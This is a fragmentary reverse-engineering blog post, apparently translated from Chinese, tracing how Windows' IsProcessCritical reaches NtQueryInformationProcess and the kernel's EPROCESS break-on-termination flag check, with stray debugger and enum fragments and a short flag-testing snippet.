02 02b0fd34 7c92d7ec (T) 7c8311b9 ffffffff 00000001 ntdll!KiFastSystemCallRet
03 02b0fd38 7c8311b9 ffffffff 00000001 02b0fec4
ntdll!NtQueryInformationProcess+0xc
ntpsapi.h gives the concrete meaning of each information class. We can therefore call NtQueryInformationProcess directly from ring 3 to query critical-process status without going through IsProcessCritical (the process handle needs the PROCESS_QUERY_LIMITED_INFORMATION access right).
Reversing NtQueryInformationProcess
Since the function enters the kernel from ntdll via a system call, what we really need to reverse is ntoskrnl.exe.
ProcessBreakOnTermination is 0x1d; after locating the call site, IDA hits a jumpout and cannot continue the analysis directly.
Following these write-ups from kanxue experts, we can help IDA along (or just debug it dynamically in windbg later):
https://bbs.pediy.com/thread-259062.htm
https://www.anquanke.com/post/id/179080#h2-3
After a few reads — my reversing skills being what they are — I remembered the WRK sitting in my bookmarks, so let's read the source there instead.
The kernel simply ANDs the Flags field of the EPROCESS executive object with PS_PROCESS_FLAGS_BREAK_ON_TERMINATION (0x00002000UL, "break on process termination").
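That check is easy to mirror in a few lines. An illustrative sketch — the helper name is ours, but the constant is the WRK value quoted above:

```python
# Per the WRK source, the kernel-side check is just a bit test on EPROCESS.Flags.
PS_PROCESS_FLAGS_BREAK_ON_TERMINATION = 0x00002000  # "break on process termination"

def is_break_on_termination(eprocess_flags: int) -> bool:
    """True if the EPROCESS Flags value marks the process as critical."""
    return bool(eprocess_flags & PS_PROCESS_FLAGS_BREAK_ON_TERMINATION)

print(is_break_on_termination(0x00002000))  # True  -> critical process
print(is_break_on_termination(0x00000400))  # False
```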
ProcessQuotaLimits, // qs: QUOTA_LIMITS, QUOTA_LIMITS_EX
ProcessIoCounters, // q: IO_COUNTERS
ProcessVmCounters, // q: VM_COUNTERS, VM_COUNTERS_EX, VM_COUNTERS_EX2
Enumerating the critical processes on a system via NtQueryInformationProcess
Summary
kernel32 exports the function; ApiSet resolution ultimately lands back in kernelbase; from there the call enters ntdll and is completed in the kernel. Functions of this kind were introduced in Windows 8.1 for convenience — IsWow64Process and others are likewise wrappers around NtQueryInformation*. With that, the overall flow has been analyzed, though some details and hard spots remain unresolved. I hope this is useful.